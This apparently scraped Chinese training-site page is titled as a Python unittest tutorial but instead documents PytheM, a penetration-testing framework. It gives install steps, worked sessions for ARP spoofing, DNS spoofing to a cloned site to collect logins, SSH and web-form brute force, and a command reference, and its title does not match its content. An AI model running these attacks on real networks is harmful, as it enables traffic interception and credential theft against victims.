Python的Unittest单元测试使用详解
PytheM是一个Python渗透测试框架。它只能在osnGNU/LinuxOS系统上运行。
安装
$sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt
运行
$sudo./pythem
例子
ARP欺骗-HTTP中间人攻击
命令:
pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http
ARP+DNS欺骗-重定向到伪造的页面,收集登录凭证
使用SET等克隆工具克隆你选中的网站,并部署在Apache2上
命令:
pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns
SSH暴破-暴力破解
pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123
Web页面参数暴力破解
首先获取web页面登录时的参数格式id=value
显示重定向页面,如果定向到一个不同的页面则说明猜解正确。
命令
pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root
URL内容爆破
pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.
功能
[PytheM–PenetrationTestingFrameworkv0.3.2]
help:
打印帮助信息。
exit/quit:
退出程序。
set:
设置变量的值,参数:
interface
gateway
target
file
arpmode例子:
pythem>setinterface|openinputtoset
或者
pythem>setinterfacewlan0|don'topeninputtosetvalue
print:
打印变量的值,例子:
pythem>printgateway
scan:
进行tcp/manualport/arp扫描.
(应该在设置完网卡和目标后再调用)例子:
pythem>scan
或者
pythem>scantcp
arpspoof:
开始或结束arpspoofing攻击.(使用rep或req可以设置arp欺骗的模式,rep表示欺骗响应,req表示欺骗请求)
参数
start
stop
例子:
arpspoofstartarpspoofstop
dnsspoof:
开始dnsspoofing攻击.(应该在arp欺骗攻击开始后再调用)例子:
pythem>dnsspoofstartpythem>dnsspoofstop
sniff:
开始嗅探数据包(应该在设置网卡后再调用)例子:
pythem>sniffhttp
或者
pythem>sniff
[+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.
pforensic:
开始分析数据包(应该在设置完网卡和.pcap文件后调用)例子:
pythem>pforensicpforensic>help
brute-force:
开始暴力破解攻击(应该在设置完目标和字典文件路径后调用)参数:
ssh|目标是IP地址ipaddressastargeturl|目标是url(包含http://或https://)webform|目标是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh
geoip:
显示IP地址的大概位置(应该在设置目标(IP地址)后再调用)例子:
pythem>geoip
或者
pythem>geoip8.8.8.8
decodeandencode:
以选择的模式解码和编码字符串,例子:
pythem>decodebase64pythem>encodeascii
cookiedecode:
解码base64url编码的cookie的值,例子:
pythem>cookiedecode
其它在控制台可以执行的命令,比如cd,ls,nano,cat等。
Jarvis–声音控制助手
[*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以语音识
以上内容为大家介绍了Python的Unittest单元测试使用详解,希望对大家有所帮助,如果想要了解更多Python相关知识,请关注IT培训机构:千锋教育。http://www.mobiletrain.org/
相关推荐HOT
更多>>python字符串和Java字符串
接下来,又到了Python字符串与Java字符串PK的时刻。Java中有比较字符串的方法,即compareTo()方法与equals()方法,前一个方法逐一比较两个字符...详情>>
2023-11-13 21:55:38七本经典python书籍
如果你想学习Python,市场上有许多可用的资源,本文我们为广大初学者们推荐7本最经典的Python书籍,这些书籍都非常受欢迎,你可以根据自己的需...详情>>
2023-11-13 21:07:28用Python的特性来切片无限生成器
注解推迟评估在Python3.7中,只要激活了正确的__future__标志,注解在运行时就不会被评估:from__future__importannotationsdefanother_brick(详情>>
2023-11-13 20:04:43Python实现文章自动生成
下面的Python程序实现了通过从网页抓取一篇文章,然后根据这篇文章来生成新的文章,这其中的原理就是基于概率统计的文本分析。过程大概就是网页...详情>>
2023-11-13 16:46:21